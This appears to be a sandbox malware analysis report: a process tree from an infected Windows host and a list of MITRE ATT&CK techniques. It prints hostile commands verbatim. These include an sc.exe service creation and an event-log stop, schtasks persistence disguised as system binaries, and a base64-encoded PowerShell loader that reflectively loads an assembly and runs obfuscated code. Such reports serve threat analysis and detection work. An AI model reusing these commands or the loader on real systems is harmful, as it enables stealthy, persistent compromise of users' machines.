- - C:\Users\Admin\AppData\Local\Temp\is-HSPUH.tmp\june.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-HSPUH.tmp\june.tmp" /SL5="$402F6,3525916,54272,C:\Users\Admin\AppData\Local\Temp\a\june.exe"
    3⤵
    PID:6076
  - - C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe
      "C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe" -i
      4⤵
      PID:668
  - - C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe
      "C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe" -s
      4⤵
      PID:5324
- C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe
  "C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe"
  2⤵
  PID:5116
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5328
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5116 -s 784
    3⤵
    - Program crash
    PID:5500
- C:\Users\Admin\AppData\Local\Temp\a\new.exe
  "C:\Users\Admin\AppData\Local\Temp\a\new.exe"
  2⤵
  PID:4424
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5416
- C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe"
  2⤵
  PID:5572
- C:\Users\Admin\AppData\Local\Temp\a\123p.exe
  "C:\Users\Admin\AppData\Local\Temp\a\123p.exe"
  2⤵
  PID:5232
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    PID:1688
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    PID:4624
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    PID:1308
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    PID:4476
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "OBGPQMHF"
    3⤵
    - Launches sc.exe
    PID:1448
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:1032
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:2012
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "OBGPQMHF"
    3⤵
    - Launches sc.exe
    PID:1848
- C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe
  "C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe"
  2⤵
  PID:5564
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\BlockComponentwebMonitordhcp\AbAw8xfGFsmxdxvuwvbKubDJeV.vbe"
    3⤵
    PID:5364
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\BlockComponentwebMonitordhcp\8H5kf2bUK2r.bat" "
      4⤵
      PID:3164
    - - C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe
        
        "C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe"
        5⤵
        
        PID:1792
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\e7y5BJ2Jvi.bat"
        6⤵
        
        PID:1276
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:508
        
        C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe
        
        "C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe"
        7⤵
        
        PID:5284
        
        C:\Users\Default User\SearchUI.exe
        
        "C:\Users\Default User\SearchUI.exe"
        8⤵
        
        PID:280
- C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe"
  2⤵
  PID:1840
- - C:\Users\Admin\AppData\Local\Temp\u1f4.0.exe
    "C:\Users\Admin\AppData\Local\Temp\u1f4.0.exe"
    3⤵
    PID:5336
- - C:\Users\Admin\AppData\Local\Temp\u1f4.1.exe
    "C:\Users\Admin\AppData\Local\Temp\u1f4.1.exe"
    3⤵
    PID:4200
- C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe
  "C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe"
  2⤵
  PID:1416
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    3⤵
    PID:5248
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
    3⤵
    PID:5960
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
    3⤵
    PID:3580
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
      4⤵
      Creates scheduled task(s)
      PID:1288
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
    3⤵
    PID:1308
- C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe"
  2⤵
  PID:3328
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "hgfhjjhgj" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:3976
- C:\Users\Admin\AppData\Local\Temp\a\crypt.exe
  "C:\Users\Admin\AppData\Local\Temp\a\crypt.exe"
  2⤵
  PID:1844
- - C:\Windows\SysWOW64\wscript.exe
    "wscript.exe" "C:\Users\Admin\start.vbs"
    3⤵
    PID:2092
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "
      4⤵
      PID:812
    - - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KDQokZW5jb2RlZEFycmF5ID0gQCgxNTksMjIwLDIzOCwyMzgsMjI0LDIzMiwyMjEsMjMxLDI0NCwxNjksMTkyLDIzMywyMzksMjM3LDI0NCwyMDMsMjM0LDIyOCwyMzMsMjM5LDE2OSwxOTYsMjMzLDI0MSwyMzQsMjMwLDIyNCwxNjMsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjcsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjQsMTgyKQ0KJGRlY29kZWRTdHJpbmcgPSBDb252ZXJ0LUFzY2lpVG9TdHJpbmcgJGVuY29kZWRBcnJheQ0KDQoNCiRmaWxlUGF0aCA9IEpvaW4tUGF0aCAkZW52OlVzZXJQcm9maWxlICJleHBsb3Jlci5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\explorer.ps1' -Encoding UTF8"
        5⤵
        
        PID:1360
    - - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\explorer.ps1"
        5⤵
        
        PID:804
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5832
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:444
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:6136

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
1⤵
PID:4416
- C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
  "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
  2⤵
  PID:4240

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Portable Devices\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5004

C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
1⤵
PID:1688
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:1304
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:5060
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:5616
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:5364
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4368
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:5436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5252

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5728

C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
1⤵
PID:3412
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  2⤵
  PID:5072
- C:\Windows\system32\cmd.exe
  "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
  2⤵
  PID:228
- C:\Windows\system32\cmd.exe
  "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
  2⤵
  PID:4340
- - C:\Windows\system32\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
    3⤵
    - Creates scheduled task(s)
    PID:4428
- C:\Windows\system32\cmd.exe
  "cmd" /c copy "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
  2⤵
  PID:6016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "u42g.0u" /sc MINUTE /mo 12 /tr "'C:\BlockComponentwebMonitordhcp\u42g.0.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2436

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2920

C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
1⤵
PID:3180
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  2⤵
  PID:5044
- C:\Windows\system32\cmd.exe
  "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
  2⤵
  PID:5964
- C:\Windows\system32\cmd.exe
  "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
  2⤵
  PID:5752
- - C:\Windows\system32\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
    3⤵
    - Creates scheduled task(s)
    PID:3096
- C:\Windows\system32\cmd.exe
  "cmd" /c copy "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
  2⤵
  PID:5512

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "u42g.0" /sc ONLOGON /tr "'C:\BlockComponentwebMonitordhcp\u42g.0.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "u42g.0u" /sc MINUTE /mo 13 /tr "'C:\BlockComponentwebMonitordhcp\u42g.0.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Program Files\Internet Explorer\uk-UA\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\uk-UA\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Program Files\Internet Explorer\uk-UA\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsmR" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\RegAsm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5076

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsm" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\RegAsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1856

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsmR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\RegAsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchUIS" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\SearchUI.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:204

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchUI" /sc ONLOGON /tr "'C:\Users\Default User\SearchUI.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4136

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchUIS" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\SearchUI.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2192

C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
1⤵
PID:5040
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  2⤵
  PID:5728
- C:\Windows\system32\cmd.exe
  "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
  2⤵
  PID:1764
- C:\Windows\system32\cmd.exe
  "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
  2⤵
  PID:5732
- - C:\Windows\system32\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
    3⤵
    - Creates scheduled task(s)
    PID:1856
- C:\Windows\system32\cmd.exe
  "cmd" /c copy "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
  2⤵
  PID:1100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4692

C:\Windows\svchost.exe
C:\Windows\svchost.exe
1⤵
PID:4564

C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
1⤵
PID:2952
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  2⤵
  PID:5648
- C:\Windows\system32\cmd.exe
  "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
  2⤵
  PID:2376
- C:\Windows\system32\cmd.exe
  "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
  2⤵
  PID:5460
- - C:\Windows\system32\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
    3⤵
    - Creates scheduled task(s)
    PID:4004
- C:\Windows\system32\cmd.exe
  "cmd" /c copy "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
  2⤵
  PID:2416

C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
1⤵
PID:3188
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  2⤵
  PID:3728
- C:\Windows\system32\cmd.exe
  "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
  2⤵
  PID:5704
- C:\Windows\system32\cmd.exe
  "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
  2⤵
  PID:4132
- - C:\Windows\system32\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
    3⤵
    - Creates scheduled task(s)
    PID:620
- C:\Windows\system32\cmd.exe
  "cmd" /c copy "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
  2⤵
  PID:5900

C:\Program Files\Windows Defender Advanced Threat Protection\RegAsm.exe
"C:\Program Files\Windows Defender Advanced Threat Protection\RegAsm.exe"
1⤵
PID:5072

C:\Users\Default User\SearchUI.exe
"C:\Users\Default User\SearchUI.exe"
1⤵
PID:2220

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery